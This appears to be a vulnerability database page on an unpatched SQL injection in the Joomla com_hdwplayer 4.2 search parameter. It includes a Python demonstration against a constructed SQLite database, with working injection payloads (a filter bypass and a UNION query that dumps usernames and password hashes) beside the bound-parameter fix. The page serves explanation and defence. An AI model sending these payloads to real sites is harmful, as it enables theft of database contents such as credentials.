CVE-2020-37218
Description
Joomla com_hdwplayer 4.2 contains an SQL injection vulnerability in the search.php file that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the hdwplayersearch parameter. Attackers can submit POST requests with crafted SQL payloads in the hdwplayersearch parameter to extract sensitive database information from the hdwplayer_videos table.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Unauthenticated SQL injection in Joomla com_hdwplayer 4.2 allows attackers to extract database contents via the hdwplayersearch parameter in search.php.
Root Cause
CVE-2020-37218 is an SQL injection vulnerability in the Joomla component com_hdwplayer version 4.2. The issue resides in the models/search.php file, specifically in the getsearch function at line 33. The application concatenates the user-supplied hdwplayersearch POST parameter directly into the query string, three times, without escaping or parameter binding [1][2]. The vulnerable query is:
SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')
Exploitation
An attacker can exploit this vulnerability by sending a crafted POST request to the Joomla index page with the parameters option=com_hdwplayer and view=search and a malicious hdwplayersearch value. No authentication is required, and the attack can be performed remotely over the network [2]. The hdwplayersearch parameter is read via JRequest::getVar() as a string, which neither escapes quotes nor otherwise validates the value for use in SQL, so a single quote in the parameter closes the LIKE literal and the remainder is executed as SQL [1]. Tools such as sqlmap can automate detection and data extraction [1].
Impact
Successful exploitation allows an unauthenticated attacker to execute arbitrary SQL queries against the underlying MySQL database. This can lead to extraction of sensitive information from the hdwplayer_videos table and, because the injection sits in a SELECT that can be extended with UNION or subqueries, potentially from any other table the database account can read. The confidentiality impact is high, while integrity impact is low and availability impact is none [2]. An attacker could retrieve password hashes, session tokens, or other confidential data stored in the Joomla database.
Mitigation
As of the referenced advisories, no official patch has been released for this vulnerability. Users are advised to disable or remove the com_hdwplayer component until a fix is available [1]. The correct vendor-side fix is to pass the search term to the database as a bound parameter (or at minimum through the database driver's quoting) rather than concatenating it into the query string; because the value lands inside a LIKE pattern, the % and _ wildcards should also be escaped so that user input matches literally.
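The Root Cause, Exploitation and Mitigation passages above describe the same mechanism: a search term concatenated into three LIKE clauses, the payload shapes that turn it into arbitrary SQL, and the bound-parameter fix. The following example is added here and is not code from the page, the advisory or the component; it reproduces the page's query against a constructed in-memory SQLite database (table names without Joomla's #__ prefix, and column layouts that are assumed, since the page lists none) and shows a filter bypass, a UNION dump of a second table, the single-quote probe a scanner relies on, and the hardened form of the query.

```python
import sqlite3

# Constructed stand-in rows for the Joomla tables. Joomla's "#__" table
# prefix placeholder is dropped, and the column layouts are assumptions.
VIDEOS = [
    (1, "Intro to Joomla", "tutorial", "joomla,cms", 1),
    (2, "Unlisted draft", "internal", "draft", 0),
    (3, "50% off sale", "promo", "sale", 1),
]
USERS = [(1, "admin", "$2y$10$constructed-hash-not-real")]

# Payloads an attacker would place in the hdwplayersearch POST field.
BYPASS_FILTER = "') OR 1=1 -- "
DUMP_USERS = "') UNION SELECT id, username, password, 0, 0 FROM users -- "


def build_db():
    """In-memory SQLite database seeded with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hdwplayer_videos (id INTEGER, title TEXT, "
                 "category TEXT, tags TEXT, published INTEGER)")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO hdwplayer_videos VALUES (?,?,?,?,?)", VIDEOS)
    conn.executemany("INSERT INTO users VALUES (?,?,?)", USERS)
    return conn


def vulnerable_search(conn, search):
    """Mirrors the getsearch() query: the raw parameter is concatenated three
    times into the statement, so one quote in it ends the LIKE literal."""
    sql = (
        "SELECT * FROM hdwplayer_videos WHERE published=1 AND ("
        f"title LIKE '%{search}%' OR category LIKE '%{search}%' "
        f"OR tags LIKE '%{search}%')"
    )
    return conn.execute(sql).fetchall()


def escape_like(value, esc="\\"):
    """Escape LIKE metacharacters so user text matches literally. Binding
    alone stops injection; this also stops % and _ acting as wildcards."""
    return value.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")


def safe_search(conn, search):
    """Hardened form: the pattern travels as a bound parameter, never as SQL text."""
    pattern = "%" + escape_like(search) + "%"
    sql = (
        "SELECT * FROM hdwplayer_videos WHERE published=1 AND ("
        "title LIKE ? ESCAPE '\\' OR category LIKE ? ESCAPE '\\' "
        "OR tags LIKE ? ESCAPE '\\')"
    )
    return conn.execute(sql, (pattern, pattern, pattern)).fetchall()


def raises_sql_error(search_fn, conn, search):
    """True if the search term breaks the statement: the syntax error a
    scanner such as sqlmap looks for when it sends a lone quote."""
    try:
        search_fn(conn, search)
    except sqlite3.OperationalError:
        return True
    return False


def demo_results():
    """Run every case against a fresh database and return the outcomes."""
    db = build_db()
    return {
        "normal": vulnerable_search(db, "joomla"),
        "filter_bypass": vulnerable_search(db, BYPASS_FILTER),
        "cross_table_dump": vulnerable_search(db, DUMP_USERS),
        "wildcard_vulnerable": vulnerable_search(db, "%"),
        "wildcard_safe": safe_search(db, "%"),
        "safe_bypass": safe_search(db, BYPASS_FILTER),
        "safe_dump": safe_search(db, DUMP_USERS),
        "quote_breaks_vulnerable": raises_sql_error(vulnerable_search, db, "'"),
        "quote_breaks_safe": raises_sql_error(safe_search, db, "'"),
    }


if __name__ == "__main__":
    for name, value in demo_results().items():
        print(f"{name}: {value}")
```

The BYPASS_FILTER payload closes the parenthesised LIKE group and comments out the rest of the line, so the published=1 restriction is discarded and the unpublished row comes back; DUMP_USERS uses the same closing trick to append a UNION that pulls rows from an unrelated table, which is the "other tables" case in the Impact section. The MySQL comment form needs the trailing space after the two dashes, which is why the payloads carry it. In safe_search the same strings return nothing, a lone quote no longer produces a syntax error, and a literal % in the search matches only the row that actually contains one.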
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 1
Patches: 0 (No patches discovered yet.)
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References: 4
News mentions: 0 (No linked articles in our index yet.)